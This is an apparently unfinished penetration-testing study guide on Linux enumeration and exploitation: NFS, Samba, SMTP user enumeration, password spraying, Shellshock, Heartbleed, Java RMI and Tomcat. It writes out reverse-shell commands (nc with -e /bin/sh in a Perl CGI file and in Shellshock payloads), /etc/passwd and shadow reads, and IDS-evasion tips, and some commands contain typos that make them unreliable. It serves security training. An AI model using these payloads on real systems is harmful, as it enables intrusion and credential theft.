WIP - Linux Exploitation

Linux and other variants of UNIX make up a very large segment of the overall internet infrastructure (including Critical Infrastructure).

This document is still in progress...

Information Gathering

Information gathering and enumeration phases of any penetration test are considered the most important.

It is the result of these phases of the engagement that lead us to identify vulnerabilities, misconfigurations and ultimately to exploitation.

Remote Enumeration - Study Guide

Remote Enumeration is the process of gathering as much information as possible about a target system from across-the-network perspective using all of the tools we have at our disposal.

OS Fingerprinting Re-cap

As a typical first step in identifying the OS of a target, we can use nmap:

# --osscan-guess enables aggressive OS detection
nmap -O --osscan-guess <ip_address>

# Open ports that are ususally returned from a port scan can offer OS insights
nmap -v -sT -O <ip_address>

The remote enumeration phase often begins with port scans for both TCP and UDP ports against target system/s, including service version fingerprinting -sV and can be accomplished with a nmap command:

nmap -v -sS -sU -sV -n 192.168.0.1/24

Enumerating NFS

One of these commonly found services is the Network File System protocol, which is a RPC-based file sharing protocol often found configured on Unix-like systems, is typically used to provide access to shared resources, and can be found listening on TCP and/or UDP port 2049. nmap can easily identify a system running NFS. Note that since NFS is an RPC-based service and relies on other RPC services (as mountd) it should be directly queried via the Portmapper service which is found on port TCP and/or UDP 111 when using nmap NSE scripts:

nmap -sT -sU -sV -p2049 <ip_address>

An administrator wishing to share files from an NFS server will configure what are known as "exports", which are the mechanism used by NFS in order to export directories, in other words, make entire directories available to other users over the network. Exports configured for any given NFS serve can usually be found in the /etc/exports file on a target host locally.

One common issue with NFS is that often administrators will configure exports with little attention to security and usually export directories in a manner that allows any host or IP address to connect, without any authentication and if you're luck, also provide write-access to directories.

Once we've identified that a server is running NFS, the first thing we want to do is to query it with several nmap NS scripts (nfs-ls, nfs-showmount and nfs-stafts). We can find them with:

ls /usr/share/nmap/scripts/ | grep nfs

# now we can obtain results relevant to NFS:
nmap --script nfs-ls, nfs-showmount-nfs-statfs <ip_address>

Alternatively we can use the built-in showmount command with the -e or --exports switches to show any exports that would be available to us as well. However, we can see it won't return as much information as nmap:

showmount -e <ip_address>

Ideally, an administrator would want to explicitly define (whitelist) IP addresses or hosts that should be allowed to connect to the NFS server. Even in the case where our access is restricted due to an NFS whitelist configuration like the above, the output still gives us valuable information regarding which IP addresses or hosts can mount any available exports. In this scenario, that information would be useful in the case we can either spoof our IP address to match a whitelisted IP address or take control of a host which is allowed to connect.

Once we've gathered the relevant NFS server information and have confirmed a misconfiguration, we can attempt to mount the available exported directories. This can be accomplished by first creating a temporary directory as your mount point, and then the exported NFS directory can be mounted:

mkdir -p /mnt/home/bob
mount -t nfs <nfs_server_ip>:/home/bob /mnt/home/bob -o nolock
mount # just test 
cd /mnt/home/bob && ls -al

Enumerating Portmapper (rpcbind)

Portmapper (or rpcbind) is another common service found on a Linux-based systems and is used to essentially "map" RPC or "ONC RPC" (Open Network Computing Remote Procedure Call) services to their corresponding TCP or UDP ports on a target system.

Information gleaned from the portmap service can offer insight regarding ports that are listening on a machine, but that may not necessarily be accessible over the network. A target system may be running a custom RPC service that is only accessible from the local host or may be running NFS, but only accessible from the local network, etc. Knowing this information can give us more insight to local services that may be running which could help us in further exploiting a system if and when local access has been obtained. Portmapper is typically found listening on ports TCP/UDP 111 and in some cases ports TCP/UDP 32771 and can be enumerated using nmap NSE scripts, or by using the built-in rpcinfo command.

Querying a single port (TCP/111) essentially enumerates all related RPC-related service ports without us having to conduct a port scan against all those ports individually. Furthermore, ii gives us knowledge of which ports the system has open locally (bound to localhost), which we couldn't normally identify with a usual port scan.

nmap's rpcinfo and rpc-grind NSE scripts can be used to enumerate the Portmapper and associated RPC services:

nmap --script rpc-grind,rpcinfo <ip_address> -p 111

# the stand-alone rpcinfo command can also give similar results
rpcinfo -p <ip_address>

SMB (Samba)

It's a Linux-based implementation of the SMB/CIFS protocols, provides a print and file sharing services for Windows clients within an environment. Recent versions can also seamlessly be integrated with Active Directory domains. Samba can offer us a great bit of information when enumerated properly.

Depending on the configuration, we can obtain OS version, user accounts on the system, file shares, their permissions and potentially sensitive data, and, depending on its integration with Active Directory, can be used to enumerate much more information. Improperly configured Samba servers can also lead to remote code execution among other things.

Samba can be trivially identified with a version scan against the NetBIOS ports:

nmap -sT -sU -sV <ip_address> -p136,137,138,139,445 --open

There are several smb-related NSE scripts to get an idea of shares that available on the target. We can use:

nmap --script smb-enum-shares <ip_address>

Alternatively we can also use smbclient to obtain similar info about shares, including Workgroup and NetBIOS name. Simply hitting 'enter; at the authentication prompt to obtain results also confirms that anonymous or guest access to the Samba server is enabled:

smbclient -L <ip_address>

In addition to simply listing shares which we have access to, we also want to know what type of access we have to which shares (read only, write, etc) with smbmap:

smbmap -H <ip_address>

Once we've identified shares, we have several options for interacting with them:

smbclient \\\\<ip_address>\\<share_name>

# or

mkdir /mnt/folder
# apt install cifs-utils
mount -t cifs \\\\<ip_address>\\<share_name> /mnt/folder
cd /mnt/folder && ls -las

SMB Users

Enumerating users when it comes to Samba or over SMB can be accomplished in several ways.

Method #1: bash "for loop" and rpcclient

Using rpcclient and list of potential usernames we've gather from other phases of information gathering:

for u in $(cat users.txt)
do
    rpcclient -U "" <ip_address> -N --command="lookupnames $u"
done
grep "User: 1"

There are several options available with rpcclient. Some useful commands include loopupsids, netshareenum, srvinfo and enumprivs.

Method #2: Automated (enum4linux)

It can be used to enumerate the following:

  • Operating system

  • Users

  • Password Policies

  • Group Membership

  • Shares

  • Domain/Workgroup Identification

enum4linux <ip_addess>

Enumerating SMTP Users

You're probably familiar with the HELO, RCPT or MAIL verbs if you've ever sent an email while directly connected to an email server via telnet or some other way.

The following information does apply for both Windows and Linux-based mail servers since SMTP is the underlying protocol, but since a large majority of mail servers in-use are Linux-based, we'll be focusing on enumerating users from sendmail. If the wild, you'll mostly encounter sendmail, postfix, exim or Microsoft Exchange.

Similar to the user enumeration process for SMB users, there are several ways to accomplish this task either using manual methods or using tools designed for the purpose of enumerating users form a mail server.

The first task is to enumerate which options, verbs or features are enabled on an SMTP server, usually found on TCP/25:

nmap --script smtp-commands <ip_address> -p 25

# or

nc <ip_address>

# or 

telnet <ip_address>

We are interested in: RCPT, VRFY and EXPN.

Using RCPT TO, we can enumerate users via direct connection to the mail server with either telnet or nc.

telnet <ip_address>
HELO
MAIL FROM

Valid users will return a Status code of 250 2.1.5 while a 550 5.1.1 status code and User unknown message denotes a non-existent user.

Another feature we can use to enumerate users in the EXPN feature, which was designed to be used to query a mail server for a list of members within a mailing list on a server.

The typical command would be EXPN mailing-list-name or EXPN username.

Valid users will return a Status Code of 250 2.1.5 while 550 5.1.1 status code and User unknown message denotes a non-existent user.

Lastly the VRFY request can also be used an is more common than the EXPN method. The same command line can be used with VRFY and the results are similar to the EXPN output. Same status codes are used.

smtp-user-enum is a great tool that automates the user enumeration process for SMTP. smtp-user-enum tests all three methods, RCPT, EXPN and VRFY against a list of users:

smtpuser-enum -M VRFY -U users.txt -t <ip_address>
smtpuser-enum -M EXPN -U admin1 -t <ip_address>
smtpuser-enum -M RCPT -D users.txt -T mail-server.ips.txt
smtpuser-enum -M EXPN -D example.com -U users.txt -t <ip_address>

Local Enumeration - Study Guide

We go for local enumeration once we've obtained access to a Linux machine.

  • either as a low privileged or high privileged user

  • via a shell

  • through a web application

... with the ultimate goal of obtaining higher-level access to our current machine and access to other machines within an environment as a result of information obtained from our exploited host.

Network Information

We can ask ourselves some important questions:

  • How is the exploited machined connected to the network?

  • Is the machine multi-homed? Can we pivot to other hosts in other segments?

  • Do we have unfettered outbound connectivity to the internet or is egress traffic limited to certain ports or protocols?

  • Is there a firewall between me and the other devices/machines?

  • Is the machine I'm on communicating with other hosts? If so, what is the purpose or function of the hosts that my current machine is communicating with?

  • What protocols are being used that are originating from my actively exploited machine? Are we initiating FTP connections or other connections (ssh, etc) to other machines?

  • Are other machines initiating a connection with me? if so, can that traffic be intercepted or sniffed as cleartext in transit? Is it encrypted?

Ifconfig

Used to get information regarding our current network itnerfaces. We want to know what our IP address is, and whether or not there are additional interfaces that we may be able to use as pivots to other network segments.

ifconfig -a

route

Used to print our current network routes, which includes our gateway. Knowing what our static routes and gateway are can help us in case we need to manually configure our network interfaces, pivot to other network segments or will come in handy if we decide to execute ARP-poisoning or other MITM attacks.

route -n

traceroute

Sometimes we'll want to know how many hops there are between our compromised machine and other network segments:

traceroute -n <ip_address>

DNS Information

  • What machine is resolving our DNS queries?

  • Can we use it to exfiltrate data over a DNS tunnel?

  • Is the DNS server vulnerable to any exploits?

  • Is it an Active Directory controller?

cat /etc/resolv.conf

ARP Cache

The systems' ARP cache can be used to give us a bit of situational awareness regarding machines near us, or machines that our currently exploited system communicates with for one reason or another. This information is useful when it comes down to determining who we're communicating with, what's being communicated and whether that traffic or communication has any value to us from an exploitation perspective, like credentials transmitted in cleartext:

arp -en

netstat

Gives us insight regarding:

  • What other machines or devices we are currently connected to.

  • Which ports or services on other machines we are connected to.

  • What ports our current machine are listening on.

  • Are there other systems establishing connections with our current machine.

We can list all TCP and UDP connections to other systems and listening services with:

netstat -auntp

In the rare case you're on a very restricted system, the netstat command is missing, you can get similar information from the /proc/net/tcp and /proc/net/udp files.

ss

An alternative to netstat that we can use to list active networks connections.

ss -twurp

Gives another perspective on established connections, bytes being transferred, and the processes/users responsible for the connections.

Outbound Port Connectivity

Another thing we want to check is whether or not our outbound port connectivity is restricted in any way.

Knowing this information will be useful if we need to establish outbound connections to other systems we control for the purpose of maintaining access or exfiltrating data.

A quick way we can check outbound port connectivity status is with portquiz.net, which is a web server which has most TCP ports listening. We can use it to confirm we can connect to arbitrary ports outside of our network with a quick nmap scan:

nmap -sT -p4444-4450 portquiz.net

Keep in mind that any scans originating from your compromised machine can alert network administrators of anomalous activity. Consider using nmap's --T (timing) option at a low value to stay under any internal IDS radar.

Network Information Commands

cat /etc/resolv.conf            # DNS Server
ifconfig -a                     # list current network interface configuration
route                           # current network route information
traceroute -n <ip_address>      # trace our route accross network segments
arp -a                          # list our ARP cache
netstat -auntp                  # established and listening TCP/UDP ports/connections
ss -twurp                       # listing active connections, processes, users and bytes
nmap -sT -p5555 portquiz.net    # check outbound firewall rules

System Information

The System Information gathering phase is much like the Network Information phase, except we're getting much more data. Our goal with this phase is to get information regarding:

  • OS and Kernel

  • Env Variables

  • Interesting Files and Sensitive Information

  • Users, Groups, Permissions and Privileges

  • Services and Associated Configuration Files

  • Cron Jobs, System Tasks

  • Installed Applications and Versions

  • Running Processes

Our ultimate objective from this portion of the testing is to elevate our privileges once we've obtained access to a system or systems and obtain additional footholds within an environment as a result of the information we obtain.

id                    # current user information
uname -a              # kernel version
grep $USER /etc/passwd # Current User Information from /etc/passwd
lastlog               # most recent logins
w                     # who is currently logged onto the system
last                  # last logged on users

# all users including UID and GID information
for user in $(cat /etc/passwd | cut -f1 -d":"); do id $user;done

# List all UID 0 (root) accounts
cat /etc/passwd | cut -f1,3,4 -d":" | grep "0:0" | cut 0f1 0d":" | awk '{print $1}'

cat /etc/passwd       # Read passwd file
cat /etc/shadow       # check readibility of the shadow file
sudo -l               # what can we sudo without a password
cat /etc/sudoers      # can we read /etc/sudoers file?
cat /root/.bash_history # can we read roots .bash_history files?
cat /etc/issue        # OS
cat /etc/*-release    # OS

# can we sudo known binaries that allow breaking out into a shell?
sudo -l | grep vim
sudo -l | grep nmap
sudo -l | grep vi

ls -als /root/        # can we list root's home directory?
echo $PATH            # current $PATH env variable
cat /etc/crontab && ls -als /etc/cron*    # list all cron jobs
find /etc/cron* -type f -perm -o+w -exec ls -l {} \; # find world-writeable cron jobs
ps auxwww             # list running processes
ps -u root            # list all processes running as root
ps -u $USER           # list all processes running as current user
find / -perm -4000 -type f 2>/dev/null    # Find SUID files
find / -uid 0 -perm -4000 -type f 2>/dev/null    # Find SUID files owned by root
find / -perm -2000 0type -f 2>/dev/null          # Find GUID files
find -perm -2 -type f 2>/dev/null                # Find wolrd-writable files
ls -al /etc/*.conf                               # list all conf files in /etc/
grep pass* /etc/*.conf    # Find conf files that contain the string "pass*"
lsof -n                   # list open files
dpkg -l                   # list installed packages (debian)

# Common software versions
sudo -V 
httpd -v
apache2 -v
mysql -V
sendmail -d0.1

# print process binaries/paths and permissions
ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null |awk '!x[$0]++'

LinEnum

Automatic Information Gathering Tool which takes care of a lot of that process.

LinuxPrivChecker

Privilege escalation method finder.

unix-privesc-check

Script for finding common misconfigurations which can help us elevate our privileges on a Linux-based system.

mimipenguin

Tool we can use for dumping the logon password for the currently logged on user, this should be done during the post-exploitation phase.

Exploitation over the Network

Remote Exploitation Introduction - Study Guide

Once we've identified vulnerabilities or misconfigurations as a result of the Information Gathering phase, the next logical step is to continue our enumeration and move into exploitation phase.

Password Spray Attack / Reverse Brute-Force attack

Rather than the usual dictionary brute force methods involving a dictionary of hundreds if not millions of password entries, the idea is to reverse the process and instead, introduce a list of as many users as possible, while trying just a single password attempt against tens or hundreds of user accounts.

This method reduces the potential for accounts lockouts and in some cases, allows us to stay "under the radar" when attempting single passwords against many users. To successfully execute a password spray attack, we must first gather as many usernames as possible in regard to our target organization or target system.

We can use tools such as theHarvester to get an idea of user naming conventions organizations are using for their users. Utilizing more than one tool to help compile an initial user list will only help us in our quest.

For enumerating SMTP users: smtp-user-enum and also several manual methods as VRFY,EXPNMetasploit also contains an auxiliary scanner module known as smpt_enum.

First we'll need to create our initial user list. We can quickly create a list of 50 users with the following command, where john.txt is taken directly from the Statiscally Likely Usernames list:

head -n john.txt >> users.txt

Once we've created our initial list of users, combined with users we've gathered from other phases of testing, we can execute our user enumeration process using the Metasploit smtp_enum module against our target SMTP server:

msf > use auxiliary/scanner/smtp/smtp_enum
msf > set RHOSTS <ip_address>
msf > set USER_FILE users.txt
msf > run

When the scanner completes (which may take several minutes depending on how many users are in our list), we can se e that we've validated several users that we can use for our password spray attack. We can now create a list of validates users. Add those to your valid_users.txt file, (one on each line) with any others you m ay have validated during information gathering.

The more users we can validate, the higher the probability that our password spray attack will succeed; so aim to create as large a list as possible, of validated user accounts.

Now that we have validated some users, we should determine one (recommended) or two (maximum) commonly-used passwords we can use for our attack.

Regarding commonly used passwords, real-world experience has shown that one of the most commonly used passwords are usually found to be the current season, along with the current year, e.g., Spring2018.

You'll be surprised at how many times you will come across multiple users, within the same environment, using the same exact password in the "Season[Year]" format. Use this lack of configuration of password complexity and human nature to choose easy-to-remember passwords to your advantage.

Another very common password "CompanyName" along with a numerical value, e.g., FooCorp01 , FooCorp02 , etc.

For our password list, we'll start with just using Spring2018 as it's very common. Use your imagination when picking a password that relates to your target in some way or another.

In environments where password complexity is not enabled (a common observation in Linux-based networks), users will take advantage of using easy-to-remember passwords that they'll modify by simply changing a value or other characteristic over time (as Password01 to Password02 or Summer2018 to Fall2018 etc).

From month to month, season to season, making minor modifications to their passwords will be enough to please the systems' passwords policy.

Now that we have a list of users we've validated, and a list containing two very common passwords, we can start our password spray attack against other services on our target machine.

Also keep in mind that password re-use is also a frequent issue and passwords may be reused across systems within an environment.

First let's determine some other services that are listening on our target system that we can execute a password spray attack against using nmap :

nmap -sT <ip_address> --open -max-retries 1 -n

Now that we have determined that there are several services we can execute our password spray attack against; ssh, smtp and smb as they utilize some form of authentication or another.

We'll use ssh just to demonstrate that we can use one particular service (as SMTP ) to enumerate for valid users that we can then use to attack an unrelated service, as ssh.

To summarize:

  1. We've created a list of users gathered through our information gathering phase, in addition to using usernames from Statistically Likely Usernames list.

  2. We've confirmed valid users using SMTP user enumeration with the smtp_enum Metasploit scanner module.

  3. We've created our list of validated user accounts, and a list containing two commonly-used passwords.

  4. We've determined several services on our target machine we can execute our password spray attack against and have decided on ssh.

Now that all those pieces are in place, we can execute our password spray attack against the SSH service. THC-Hydra is a well-known and tested brute-force tool.

Withy hydra we can supply our list of users (-L), our password list (-P) and specify the service we'd like to attack ssh, with a command line similar to the following:

hydra -L users.txt -P passwords.txt ssh://<ip_address>

Once we've obtained valid credentials for a single user, we can also exploit the common case of "password reuse" within an environment.

Using the obtained credentials, we can then use those to attempt to log in to other SSH-enabled machines as our user. This often results in access to multiple systems which can then later be used as pivots to other areas of the network or to maintain multiple footholds, etc.

Of course, this can also be done with Hydra, and in a single sweep we can determine other systems on the network, which allow access using the same credentials we've cracked. We would use the -M parameter to specify a list of ssh servers. Something like the following:

hydra -l david -p Spring2018 -M ssh_servers.txt ssh

Where ssh_servers.txt is a file containing your ssh target servers, one per line.

In addition to trying your password spray attack against the ssh service we encourage you to also experiment with brute forcing SMB or any other listening services that accept user credentials if found as well.

Metasploit's smb_login scanner module can be used to obtain similar results for password spray attacks against SMB services.

Aside from targeting Linux-based systems with password spray attacks, the same concept is, of course, valid for any type of environment or platform, as long as the service provides a means to authenticate to it.

With that said, password spray attacks are also known to be very successful against platforms such as Outlook Web Access or Exchange Portals.

Try this attack using Metasploit's owa_login brute-force module on OWA portals you are authorized to test against for great results using the Password Spray method.

A Word of Caution Regarding Password Spraying

Depending on system configurations, Password Spray Attacks can be detected and thwarted, which is why it is crucial to only attempt one (recommended) to two (maximum) passwords during a single run.

Take extra care that whichever tool you're using isn't trying blank passwords or other variations in addition to whatever is in your password list.

This would add the authentication attempts and likely result in account lockouts or detection by a SIEM or other anomalous event detection solution.

Furthermore, after attempting a password spray attack run, fi unsuccessful the first time around, wait 45 minutes and try again with new passwords in your list.

Multiple attempts within a certain time-range can also result in detection and/or lockouts.

Exploiting Samba - Study Guide

Samba is quite commonly found within Linux-based environments, as it typically provides file sharing services to both Windows and Linux users.

It's also a ripe target when configured incorrectly, and version up to 4.6.4, contain vulnerabilities that allow an attacker to take control of an affected server completely. This was most recently seen with CVI-2017-7494 sometimes referred to as SambaCry.

It will be important that we identify the exact versions of Samba, as well as identify vulnerabilities that exist in either the versions or configurations, and then exploitation of the systems.

The first task requires identifying that Samba is installed on the system and furthermore, identifying the version of Samba; this can be accomplished with a nmap smb-os-discovery script scan for port 445:

nmap --script smb-os-discovery -p445 <ip_address>

Once the version of Samba is known, we can start to investigate exactly which vulneratiblities might be present for that particular version.

searchsploit is an excellent tool for this and allows us to search all vulnerabilities for a particular software directly from the Linux command line. searchsploit is a local database of all exploits that can also be found online (www.exploit-db.com)

searchsploit samba 3.0.20

From its results we can see that we have potential vulnerability candidate. We optionally have a Metasploit module indicator as well.

Username Map Script: CVE-2007-2447

This vulnerability was discovered in 2007 by an anonymous researcher and affects Samba versions 3.0.0 through 3.0.25rc3 and exists in non-default configurations where the "username map script" option is enabled, which results in remote command execution and compromise of the affected server.

msf> use exploit/multi/samba/usermap_script
msf> set RHOST <ip_address>
msf> set LHOST <ip_address>
msf> exploit

Once the exploit is completed, we have a command Shell Session we can immediately start interacting with.

In order to have a proper Pseudo TTY:

python -c 'import pty; pty.spawn("/bin/sh");'

Another vulnerability which is a result of a particular misconfiguration in Samba but with sometimes catastrophic consequences. This vulnerability essentially allows an attacker to create a symbolic link to the root partition from a writeable share ultimately allowing for read access to the entire file system outside of the share directory.

Although this vulnerability can be exploited using smbclient, Metasploit contains a module for exploitation:

A pre-requisite to this particular vulnerability requires that the Samba server contains a writeable share and that the widelinks parameter in the smb.conf file is set with a value of yes. We can use the following smbmap command to determine shares available to us on a Samba server, in addition to determining whether or not we have read or write permissions to a given share:

smbmap -H <ip_address>

Once we've determined a writeable share is available, we can use Metasploit's samba_symlink_traversal auxiliary module to create the symlink to the root filesystem.

smbclient \\\\<ip_address>\\<folder> -N
# -N anonymous access to the share 

Downloading/uploading files can be achieved through get/put commands.

Additionally another useful command for data exfiltration when conducting post-exploitation tasks using smbclient is the tar command

smb :> tar c .. /tmp/allfiles.tar *

Writeable Samba Share to Remote Command Execution via Perl Reverse Shell

We will cover what we can do in certain situations where we have a fully patched Samba server, but have a writeable share available to us, and can exploit that scenario for remote command execution, in this case, a reverse shell.

In this case, we discover that a server we have enumerates is running a patched Samba server and contains a shared named www which appears to be possibly configured to allow administrators to easily update an internal web application.

We first determine OS and Samba version

nmap --script smb-os-discovery -p445 <ip_address>

We also determine any shares that are available to us, as well as seeing that Guest sessions to the shares are possible as well:

smbmpa -H <ip_address>
  1. Web roots often contain files specific to a web server configuration and can furthermore be used to obtain credentials to other services (e.g., MySQL).

  2. Being able to write to a web root, is even better depending on the web server configuration, for instance:

    1. Is PHP installed?

    2. Are there any other web server-interpreted languages we can use to our advantage?

    3. Can we upload any files to this directory?

    4. How will the web server handle our files?

    5. Can we exploit that to obtain remote command execution?

Our first task is to connect to the share, and have a look at its contents, and secondly, we'll want to determine if the Samba server has any HTTP ports listening, which might be serving contents of the share.

We can connect to the share with smbclient and execute the linux ls command to list files within the directory:

smbclient \\\\<ip_address>\\<holder> -N

Imagine the presence of a .pl extension indicates that the server is likely configured to process Perl. Knowing this configuration, it's time to make sure to scan against webserver ports to confirm we have a webserver running:

nmap -sT <ip_address> --max-retries 1 -n --open

Let's create a file locally on the attacker system called test.pl. The contents of this file will execute the id Linux system command and will display your current UID and GID information when access with your browser.

#!/usr/bin/perl

print "Content-type: text/html\n\n";
system("id");

And then:

smbclient \\\\<ip_address>\\www -N
smb: \> put test.pl

Now if we point a browser to our test.pl the id command is shown. But from this point we can utilize some tools that have already been written to get us a reverse shell on the system. The script itself will require some minor modifications before we can use it (as $ip , $port ). Once modified, upload it to the target via smbclient. Open a nc listerner before:

nc -nlvp 1234

Alternately, instead of using a pre-made Perl reverse shell, we could have our own script looking like:

#!/usr/bin/perl

print "Content-type: text/html\n\n";
system("nc <ip_address> 1234 -e /bin/sh")

Exploiting Shellshock - Study Guide

"Shellshock" or "Bashdoor", disclosed on September 24th 2014 is yet another vulnerability that shook the information security industry. Within hours of its release, thousands of devices and systems had already been compromised and botnets were created for the purpose of its exploitation "en-masse".

The vulnerability was discovered in the Unix Bash Shell, and affected CGI programs on web servers, Open SSH, DHCP clients and several other attack vectors.

The discovery of Shellshock resulted in several CVE's being assigned to different attack vectors:

  • CVE-2014-6271

  • CVE-2014-6277

  • CVE-2014-6278

  • CVE-2014-7169

  • CVE-2014-7186

  • CVE-2014-7187

We'll focus on the CGI attack vector.

To start understanding Shellshock, let's take a look at one method that was released in order to determine if a system was vulnerable, form a local system perspective. We can take the following as an example, as it relates directly to the initial CVE that was assigned (CVE-2014-6271). When executed on a vulnerable system, the shell would echo "vulnerable" as seen below:

env x=`() { :;}; echo vulnerable` bash -c "echo this is a test"

# when executed in a vulnerable bash shell, the string essentially
# executes an environment variable called "x".

# "x" in turns runs the "echo vulnerable" command, which is outside
# of the environment variable function

One of the primary attack verctors that was seen in the wild following the disclosure of Shellshock was the modification of User-Agent strings to include Shellshock payloads intended to run commands on the remote server. One example of this that was seen in-the-wild, was a "recon" test which would confirm to an attacker that a particular system was vulnerable; this was accomplished by modifying a sent User-Agent string to include ping command destined for the attacker's machine along with a unique payload.

If the attacker system receives the unique payload string, then this serves as confirmation that the system ran the ping command. The attacker could then tie it back to a specific vulnerable system for further exploitation later.

The User-Agent string for that test would have been something like the following:

User-Agent: () { :;}; ping -c 5 -p unique_string attacker.machine

Now that we've covered a little bit of the history of Shellshock, and some basics about its exploitation, we can start applying our knowledge to an actual scenario. Since we know that a primary attack vector was against vulnerable CGI programs, let's have a look at some things we can do to identify vulnerable programs and systems, and then exploit.

One of the first things we need to do is to locate CGI programs on a potentially vulnerable system; we can do this with an excellent tool called dirsearch which is used to execute dictionary-type attacks against web servers in search for interesting files, directories, etc.

./dirsearch.py -u http://<ip_address>/ -e cgi -r

Now that we've identified a cgi file on the server let's first confirm that we can access the file with a browser, maybe the page contains some hints as to its purpose.

We can use nmap http-shellshock nmap NSE script:

nmap --script http-shellshock --script=args uri=/cgi-bin/login.cgi <ip_address> -p 80

There are multiple ways to exploit Shellshock to gain control over a system. Basically we can execute any command we want on the remote system as the web server user is successful. We could wget the /etc/passwd.

wget -U "() { foo;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://<ip_address>/cgi-bin/login.cgi && cat login.cgi

This will issue a GET request to the target system, use a Shellshock-ified User-Agent (-U) to echo the contents of /etc/passwd to a local file on our attacker system (login.cgi) and then display its contents to us (&& cat login.cgi).

If successful, we should see the contents of the target system's /etc/passwd file displayed in our terminal.

Now we could even run a reverse shell:

wget -U "() { foo;};echo; /bin/nc <ip_address> <port> -e /bin/sh" http://<ip_address>/cgi-bin/login.cgi

Exploiting Heartbleed - Study Guide

Heartbleed, which surfaced in 2014, was a critical bug affecting OpenSSL versions 1.0.1 through 1.0.1f and allowed for the reading of encrypted data stored in memory due to a faulty implementation of the TLS (Transport Layer Security) and DTLS (Datagram Transport Layer Security) protocols' heartbeat extension (RFC6520).

In addition to the "dumping" of arbitrary encrypted data from a server, which could include anything from credentials for the application and any other sensitive data that might reside in memory at any given moment, it also allowed for the dumping of the Private Key responsible for securing that data over SSL.

Having this information would allow an attacker to intercept all SSL traffic to and from the affected server, among other things.

There are several tools in circulation which allow for the exploitation of affected OpenSSL implementation. We'll do a walkthrough with the exploit modules included within the Metasploit Framework.

First we need to identify a vulnerable OpenSSL implementation; this can either be done with nmap or Metasploit. nmap contains an NSE script ssl-heartbleed.nse which can be used to confirm our target is vulnerable with the following command line:

nmap --script ssl-heartbleed <ip_address>

Once we have confirmed our target is vulnerable, we can use Metasploit's openssl_heartbleed auxiliary scanner module to dump encrypted memory contents:

msf> use auxiliary/scanner/ssl/openssl_heartbleed

In most scenarios, we can stick with the defaults in regard to the module options. However, this particular module contains several Auxiliary actions, which we can see by running the show actions command.

set action DUMP command along with RHOST value, then run the exploit. Metasploit will store the results of the "leaked" data to a file in your ~.msf4/loot directory as a .bin file.

We can simply now run the strings command against the .bin file to see if we were able to leak anything we can use for our purposes:

~/.msf4/loot$ strings file.bin

We can see that we've successfully leaked the username and password for a user of the application.

A note about Heartbleed

Exploit scripts and modules that are circulating, if you don't get any "leaked" data from your first run of a specific tool, try again. You will find that different contents will appear t different times within the leaked memory segment of an application.

Exploiting Java RMI Registry - Study Guide

One usually under-appreciated and overlooked class of vulnerabilities consistently found on Penetration Tests are those involving Java API's, particularly, services which offer a way to invoke Java methods remotely, also known as JAVA RMI.

In particular, there exists a vulnerability in default configurations of RMI Registry and RMI Activation Services and affects what is known as "RMI Distributed Garbage Collector" and essentially allows the loading of arbitrary Java classes from an attacker -defined URL.

The Java RMI Registry service is typically found on port 1099 TCP and can be fingerprinted with a nmap version -sV and on Linux systems is identified by the GNU Classpath gmiregistry fingerprint as seen in the scan output below:

nmap -sT <ip_address> -p 1099 -sV

In addition to the nmap scan version detection method on the previous slide, there is a Metasploit scanner module for detecting vulnerable RMI Endpoints, in addition to a Metasploit exploit module exploit/multi/misc/java_rmi_server which we can use:

msf > use exploit/multi/misc/java_rmi_server
msf > show options

The SRVHOST option is by default set to 0.0.0.0 which means it should listen on any network interface and it is recommended to leave that option as is. The SRVPORT option can be left at its default unless you're already running a service on TCP 8080, in which case you will encounter an error that the module can't bind to the port. If that occurs, just modify the SRVPORT to a port that isn't currently in use on your system.

The SRVHOST and SRVPORT options are essentially what the module use as a web server that the target will use to download the Java payload from.

For additional IDS or Endpoint Detection evasion (if required for your specific target), you may also want to set SSL to true.

This can help in evading (some) on-the-wire heuristics detection solutions. However, most will flag many Metasploit modules' default SSL certificates. Hence the SSLCert option which allows you to specify your own custom SSL certificate for the SRVHOST.

As a general rule of thumb, in regard to Metasploit modules and exploits, where possible, always configure a custom SSL certificate for your listeners, etc.

This goes a long way in evading Intrusion Detection Systems. Metasploit has been around a long time, and defenders have heavily analyzed the source code, and have written detection capabilities for most modules in their default configurations. Once we've configured our options, we can attempt to exploit the target:

msf exploit(multi/misc/java_rmi_server) > run -j

We can then interact with our session and drop into a shell:

msf exploit(multi/misc/java_rmi_server) > sessions -i 1

Once again, we can upgrade our sehll:

python -c 'import tty; tty.spawn("/bin/sh")'

Important

The RMI Registry endpoint can sometimes be found listening on non-standard ports, and other ports which the service may require for other reasons. It's recommended that when assessing a target for this vulnerability, that you run a scan for all 65535 TCP ports in the case that the RMI Registry has been configured to listen on ports other than 1099 TCP.

That goes for virtually any service.

Administrators often will change default listening ports for many common services, so be sure to conduct comprehensive port scans against your chose targets.

Exploiting Java Deserialization - Study Guide

One particular class of vulnerabilities fall under the domain of "Java Deserialization of untrusted data". This is one of the most "unspoken" vulnerabilities, however they appear to exist in many various applications and the range of affected systems is likely very high, with recent research showing popular Java-based applications Jboss, WebLogic, WebSphere and Jenkins to name a few, are affected by this class of vulnerability.

To explain it simply, serialization itself is a process which allows for applications to convert data into a binary format, which is suitable for saving to disk.

This process is vulnerable to the deserialization of untrusted "malicious" data, which can be supplied by the user, and is ultimately de-serialized by an application resulting in code execution without even requiring authentication in most cases.

If you'd like to experiment in a test environment with Java Deserialization vulnerabilities you can find a great post on how to create small and vulnerable environment at the following link:

References

Exploiting Tomcat - Study Guide

Apache Tomcat is widely used, free and open source web server used primarily for Java-based web applications. One of the primary issues we encounter on engagements is the use of default or weak credentials for administrative interfaces for any number of appliances, web server applications, etc.

Tomcat has been known in the past to ship with default credentials, and often, System Administrators will leave them be for ease-of-use, forget about changing the defaults, or whatever the case may be.

In regard to real-world experience, we find that Apache Tomcat is encountered on most engagements at a very high frequency, as there is also a Microsoft Windows version available as well, making it the primary go-to for in-house Java-based web application server.

Tomcat is known to contain an area within its administrative interface known as the "Tomcat Manager", which is an area of the web application that allows administrators to view settings for internal Tomcat configuration, system statistics quickly and most importantly for our purposes, a method to easily deploy Java applications.

Determining if an Apache Tomcat server is using default credentials, can be as easy as simply browsing to its web interface (typically found on port 8180 TCP), and trying some of the known defaults manually. Services can be configured on whatever port the administrator desires, so always make sure to scan non-standard ports for common applications.

As Penetration Testers, the more efficiently we can conduct and automate certain tasks, the more time we have for exploitation and writing reports.

